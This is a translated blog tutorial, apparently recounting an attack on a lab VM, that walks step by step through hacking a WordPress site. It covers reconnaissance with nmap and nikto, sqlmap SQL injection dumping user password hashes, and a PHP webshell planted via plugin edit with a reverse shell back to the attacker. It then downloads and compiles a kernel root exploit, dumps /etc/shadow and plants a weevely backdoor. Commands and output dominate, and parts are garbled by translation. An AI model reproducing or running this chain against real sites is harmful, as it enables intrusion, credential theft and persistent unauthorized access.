How hackers have hacked into your site

Source: Internet
Author: User
Tags gopher website server what scripting domain name registration wordpress database


 

This question is difficult to answer, simply speaking, there are many ways to invade a website. The purpose of this article is to demonstrate the techniques that hackers commonly use to scan and invade websites.

Suppose your site is: hashlinux.com

Let's ping this server:


We got an IP address: 173.236.138.113– This is the IP address of our destination server.

Sameip.org can help us find other domains that bind to this server

Same IP

Sites hosted on IP Address 173.236.138.113

There are 26 sites on this server (173.236.138.113). Many hackers will choose to attack different sites on the same server to invade your site. But for the purposes of learning, we only choose to invade your server.

We need to get a message from your site:

1.DNS Records (A,NS,TXT,MX and SOA)

2. Type of Web server (APACHE,IIS,TOMCAT)

3. Domain name registration information (which company owns this domain name)

4. Your name, address, email and phone number

5. The type of script that is running on your website (php,asp,asp.net,jsp,cfm)

6. Type of operating system for the server (Unix,linux,windows,solaris)

7. Ports open to the server (80,443,21, etc.)

Now let's look for the DNS records for the site. Select Site "who.is" to achieve this goal.

  


We found that the DNS records on the site were:

  


Let's check the type of Web server:

  


We can see that the website server is using Apache. We'll check the Apache version later.

hashlinux.com SITE Information

ip:173.236.138.113

Website status:active

Server Type:apache

Alexa trend/rank:1 month:3,213,968 3 month:2,161,753

Page views per visit:1 month:2.0 3 month:3.7

Next we look for the domain name registration information:

  


We have registered people and other important information. We can use Whatweb to detect what scripting language your site is using, as well as the type of operating system and the version of the Web server.

  


  


We can see that the website is using WordPress, the operating system type is Fedora Linux, the website server version is Apache 2.2.15, let us check the server on the open port:

We use Nmap:

1. Detect which services are running on the server:

[Email protected]:/# nmap-sv hashlinux.com

Starting Nmap 5.59beta1 (http://nmap.org) at 2011-12-28 06:39

Nmap Scan Report for hashlinux.com (192.168.1.2)

Host is up (0.0013s latency).

Not shown:998 filtered ports

PORT State SERVICE VERSION

22/TCP closed SSH

80/TCP Open http Apache httpd 2.2.15 (Fedora)

MAC address:00:0c:29:01:8a:4d (VMware)

Service Detection performed. Incorrect results at http://nmap.org/submit/.

Nmap done:1 IP Address (1 host up) scanned in 11.56 seconds

2. Detecting the server's OS

[Email protected]:/# nmap-o hashlinux.com

Starting Nmap 5.59beta1 (http://nmap.org) at 2011-12-28 06:40

Nmap Scan Report for hashlinux.com (192.168.1.2)

Host is up (0.00079s latency).

Not shown:998 filtered ports

PORT State SERVICE

22/TCP closed SSH

80/TCP Open http

MAC address:00:0c:29:01:8a:4d (VMware)

Device type:general Purpose

Running:linux 2.6.X

OS details:linux 2.6.22 (Fedora Core 6)

Network distance:1 Hop

OS Detection performed. Incorrect results at http://nmap.org/submit/.

Nmap done:1 IP Address (1 host up) scanned in 7.42 seconds

The server only has 80 ports open and the operating system is Linux 2.6.22 (Fedora Core 6)

Now that we've got all the important information, let's do a bit of vulnerability testing, such as SQL injection, blinds, LFI,RFI,XSS,CSRF, etc.

We use nikto.pl to get information and weaknesses:

[Email protected]:/pentest/web/nikto# perl nikto.pl-h http://hashlinux.com

-Nikto v2.1.4

---------------------------------------------------------------------------

+ Target ip:192.168.1.2

+ Target Hostname:hashlinux.com

+ Target port:80

+ Start time:2011-12-29 06:50:03

---------------------------------------------------------------------------

+ server:apache/2.2.15 (Fedora)

+ ETag header found on server, inode:12748, size:1475, mtime:0x4996d177f5c3b

+ apache/2.2.15 appears to being outdated (current was at least apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 is also current.

+ Allowed HTTP methods:get, HEAD, POST, OPTIONS, TRACE

+ Osvdb-877:http TRACE method is active, suggesting the host was vulnerable to XST

+ OSVDB-3268:/icons/: Directory indexing found.

+ OSVDB-3233:/icons/readme:apache default file found.

+ 6448 Items checked:1 error (s) and 6 item (s) reported on remote host

+ End time:2011-12-29 06:50:37 (seconds)

---------------------------------------------------------------------------

+ 1 Host (s) tested

  


You can also use W3AF, a tool that can be found in Backtrack 5 R1

[Email protected]:/pentest/web/w3af#./w3af_gui

Starting W3AF, running on:

Python version:

2.6.5 (r265:79063, APR 16 2010, 13:57:41)

[GCC 4.4.3]

GTK version:2.20.1

PyGTK version:2.17.0

W3af-web application Attack and Audit Framework

version:1.2

revision:4605

Author:andres Riancho and the W3AF team.

  


We can insert the URL and select the full audit option:

  


Wait a moment and the results will appear.

  


There are SQL injection vulnerabilities and other vulnerabilities in the Web site.

Let's go deep into SQL injection:

  


http://hashlinux.com/Hackademic_RTB1/?cat=d%27z%220

This address is the injection point,

  


We'll use Sqlmap and dump all the database information needed for the intrusion.

Sqlmap–u URL

  


Wait for a moment:

  


Select "N" to continue:

  


The SQL injection type of the site is the version of the error-based MySQL database is 5.

Add the parameter "-dbs" to find all the databases:

  


We have found 3 databases:

  


Exporting WordPress database tables with Dump–dwordpress-tables

  


  


We need to export the "wp_users" table to get user information and password hash, then we can try to crack the password finally landed in WordPress backstage.

Using the parameter "-T Wp_users–columns"

  


22 columns of data were found:

  


Use the parameter-C user_login,user_pass–dump to export the column.

Then we get the account password.

  


Then use this website to convert MD5 to plaintext (not all hashes can be converted successfully)

"Http://www.onlinehashcrack.com/free-hash-reverse.php"

  


The plaintext password is: q1w2e3

User name "Georgemiller"

Let's log in to WordPress backstage:




Now let's try uploading a PHP Webshell to execute some Linux commands on this server.

Edit WordPress "Textile" Plugin

Edit it

  


Insert a PHP Webshell instead of a real plugin. Then click Upload, PHP Webshell is successfully uploaded to the server.

  


Now, PHP Webshell is running successfully. Now you can browse all the files on the site, but we want the root of the server and then invade other sites.

Select "Back-connect" in PHP Webshell and connect to our IP "192.168.1.6″ port" 5555″


Before we click on the connection, we must first listen to a "5555" port on this machine.


Click Connect and we'll get a window like this:


Let's try the Linux command.

Id

uid=48 (Apache) gid=489 (Apache) groups=489 (Apache)

Pwd

/var/www/html/hackademic_rtb1/wp-content/plugins

Uname-a

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat 7 21:41:45 EST i686 i686 i386 gnu/linux


The ID command is used to tell us the user ID and user group

The PWD command can tell us where we are now.

The Uname–a command is used to get some information and kernel version

Well, we now know that the kernel version of the server is 2.6.31.5-127.fc12.1686

Ok, now we knew this server kernel version is 2.6.31.5-127.fc12.1686

We can find the exploit for this version in exploit-db.com.

Input: "Kernel 2.6.31"

  


The above results are not appropriate because they are not used for power. Next, that's it!

  


http://www.exploit-db.com/exploits/15285

Copy this connection

http://www.exploit-db.com/download/15285

In the Netcat shell, enter:

wget Http://www.exploit-db.com/download/15285-O roro.c

--2011-12-28 00:48:01--http://www.exploit-db.com/download/15285

Resolving www.exploit-db.com ... 199.27.135.111, 199.27.134.111

Connecting to www.exploit-db.com|199.27.135.111|:80 ... Connected.

HTTP request sent, awaiting response ... 301 Moved Permanently

location:http://www.exploit-db.com/download/15285/[following]

--2011-12-28 00:48:02--http://www.exploit-db.com/download/15285/

Connecting to www.exploit-db.com|199.27.135.111|:80 ... Connected.

HTTP request sent, awaiting response ... OK

length:7154 (7.0K) [Application/txt]

Saving to: ' RORO.C '

0K ... 100% 29.7k=0.2s


We use the wget command to get exploit-db.com Exploit,-o is to rename the file as: roro.c

Note:

Linux kernel exploits most are developed in C language, so we save the suffix named. C, directly browse the source file can be directly see source code:

#include <stdio.h>

#include <unistd.h>

#include <stdlib.h>

#include <fcntl.h>

#include

#include

#include

#include <errno.h>

#include <string.h>

#include

#include

#define Recvport 5555

#define SendPort 6666

Intprep_sock (Intport)

{

INTs, ret;

Structsockaddr_in addr;

s = socket (pf_rds, sock_seqpacket, 0);

if (s < 0) {

printf ("[*] Could not open socket.\n");

Exit (-1);

}

Www.hashlinux.com

memset (&addr, 0, sizeof (addr));

All the above lines indicate it is exploit are written in C language

After we saved our exploit on server, we'll compile it to elf format by typing

After we save exploit on the server, we can compile it:

GCC Roro.c–o RoRo


Then execute the exploit:

./roro

[*] Linux kernel >= 2.6.30 RDS socket Exploit

[*] by Dan Rosenberg

[*] Resolving kernel addresses ...

[+] Resolved Rds_proto_ops to 0xe09f0b20

[+] Resolved Rds_ioctl to 0xe09db06a

[+] Resolved Commit_creds to 0xc044e5f1

[+] Resolved prepare_kernel_cred to 0xc044e452

[*] overwriting function pointer ...

[*] Linux kernel >= 2.6.30 RDS socket Exploit

[*] by Dan Rosenberg

[*] Resolving kernel addresses ...

[+] Resolved Rds_proto_ops to 0xe09f0b20

[+] Resolved Rds_ioctl to 0xe09db06a

[+] Resolved Commit_creds to 0xc044e5f1

[+] Resolved prepare_kernel_cred to 0xc044e452

[*] overwriting function pointer ...

[*] Triggering payload ...

[*] Restoring function pointer ...

Id

At this time we are already root authority.

Uid=0 (Root) gid=0 (root)

  


We can browse/etc/shadow file

Cat/etc/shadow

root:$6$4l1ovmlpsv28evct$fqycc5mozz8mqiqgfudlshuk7r1emu/ Fxw3pocob39lxekt9vy6hygkxcleo.ab9f9t7bqtdxsjvccy.iylcp0:14981:0:99999:7:::

Bin:*:14495:0:99999:7:::

Daemon:*:14495:0:99999:7:::

Adm:*:14495:0:99999:7:::

Lp:*:14495:0:99999:7:::

Sync:*:14495:0:99999:7:::

Shutdown:*:14495:0:99999:7:::

Halt:*:14495:0:99999:7:::

Mail:*:14495:0:99999:7:::

Uucp:*:14495:0:99999:7:::

Operator:*:14495:0:99999:7:::

Games:*:14495:0:99999:7:::

Gopher:*:14495:0:99999:7:::

Ftp:*:14495:0:99999:7:::

Nobody:*:14495:0:99999:7:::

vcsa:!! : 14557::::::

avahi-autoipd:!! : 14557::::::

Ntp:!! : 14557::::::

dbus:!! : 14557::::::

rtkit:!! : 14557::::::

nscd:!! : 14557::::::

tcpdump:!! : 14557::::::

avahi:!! : 14557::::::

haldaemon:!! : 14557::::::

openvpn:!! : 14557::::::

Apache:!! : 14557::::::

saslauth:!! : 14557::::::

mailnull:!! : 14557::::::

smmsp:!! : 14557::::::

smolt:!! : 14557::::::

Sshd:!! : 14557::::::

pulse:!! : 14557::::::

Gdm:!! : 14557::::::

P0wnbox. Team:$6$rparluwe8rm9avwv$a5cooducqqy7ngvtnxafj2d5smggrrfsr6tp8g7iatveet37lugjyvhm1myhelcypkijd8yv5olmnuhwbql76 /:14981:0:99999:7:::

Mysql:!! : 14981::::::

Browse/etc/passwd file

cat/etc/passwd

Root:x:0:0:root:/root:/bin/bash

Bin:x:1:1:bin:/bin:/sbin/nologin

Daemon:x:2:2:daemon:/sbin:/sbin/nologin

Adm:x:3:4:adm:/var/adm:/sbin/nologin

Lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

Sync:x:5:0:sync:/sbin:/bin/sync

Shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

Halt:x:7:0:halt:/sbin:/sbin/halt

Mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

Uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

Operator:x:11:0:operator:/root:/sbin/nologin

Games:x:12:100:games:/usr/games:/sbin/nologin

Gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

Ftp:x:14:50:ftp User:/var/ftp:/sbin/nologin

Nobody:x:99:99:nobody:/:/sbin/nologin

Vcsa:x:69:499:virtual Console Memory Owner:/dev:/sbin/nologin

Avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin

Ntp:x:38:38::/etc/ntp:/sbin/nologin

Dbus:x:81:81:system message Bus:/:/sbin/nologin

Rtkit:x:498:494:realtimekit:/proc:/sbin/nologin

NSCD:X:28:493:NSCD Daemon:/:/sbin/nologin

Tcpdump:x:72:72::/:/sbin/nologin

Avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin

Haldaemon:x:68:491:hal Daemon:/:/sbin/nologin

Openvpn:x:496:490:openvpn:/etc/openvpn:/sbin/nologin

Apache:x:48:489:apache:/var/www:/sbin/nologin

saslauth:x:495:488: "SASLAUTHD user":/var/empty/saslauth:/sbin/nologin

Mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin

Smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin

Smolt:x:494:485:smolt:/usr/share/smolt:/sbin/nologin

Sshd:x:74:484:privilege-separated Ssh:/var/empty/sshd:/sbin/nologin

Pulse:x:493:483:pulseaudio System Daemon:/var/run/pulse:/sbin/nologin

Gdm:x:42:481::/var/lib/gdm:/sbin/nologin

P0wnbox. Team:x:500:500:p0wnbox. Team:/home/p0wnbox. Team:/bin/bash

Mysql:x:27:480:mysql Server:/var/lib/mysql:/bin/bash

We can use "John the Ripper" to hack the user's password, but we won't do it.

Hackers need to leave a backdoor on the server for easy access later.

Here, we use weevely to generate a small, password-coded PHP backdoor, which is then uploaded to the server to achieve the goal.

Weevely usage:

[Email protected]:/pentest/backdoors/web/weevely#./main.py-

Weevely 0.3-generate and manage Stealth PHP backdoors.

Copyright (c) 2011-2012 weevely developers

website:http://code.google.com/p/weevely/

Usage:main.py [Options]

Options:

-H,--help show this help message and exit

-G,--generate generate backdoor crypted code, Requires-o and-p.

-O OUTPUT,--output=output

Output filename for generated backdoor.

-C COMMAND,--command=command

Execute a single command and exit, Requires-u And-p

.

-T,--terminal Start a terminal-like session, Requires-u And-p.

-C CLUSTER,--cluster=cluster

Start in cluster mode reading items from the Give

File, in the form ' Label,url,password ' where label is

Optional.

-P PASSWORD,--password=password

Password of the encrypted backdoor.

-u URL,--url=url Remote backdoor URL.

Create a PHP backdoor with a password

[Email protected]:/pentest/backdoors/web/weevely#./MAIN.PY-G-O hax.php-p koko

Weevely 0.3-generate and manage Stealth PHP backdoors.

Copyright (c) 2011-2012 weevely developers

website:http://code.google.com/p/weevely/

+ Backdoor file ' hax.php ' created with password ' Koko '.

 

Upload a php backdoor via PHP Webshell

  

Once the upload is complete, we use the command to connect:

[Email protected]:/pentest/backdoors/web/weevely#./main.py-t-U http://hashlinux.com/Hackademic_RTB1/wp-content/ Plugins/hax.php-p Koko

Weevely 0.3-generate and manage Stealth PHP backdoors.

Copyright (c) 2011-2012 weevely developers

website:http://code.google.com/p/weevely/

+ Using method ' System () '.

+ Retrieving terminal basic environment variables.

[[email protected]/var/www/html/hackademic_rtb1/wp-content/plugins]

  


Test our hax.php back door.

  

[via Infosecinstitute translation PPSBB]


This article is from the "lake and Laughter" blog, please make sure to keep this source http://hashlinux.blog.51cto.com/9647696/1793837

How hackers have hacked into your site

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.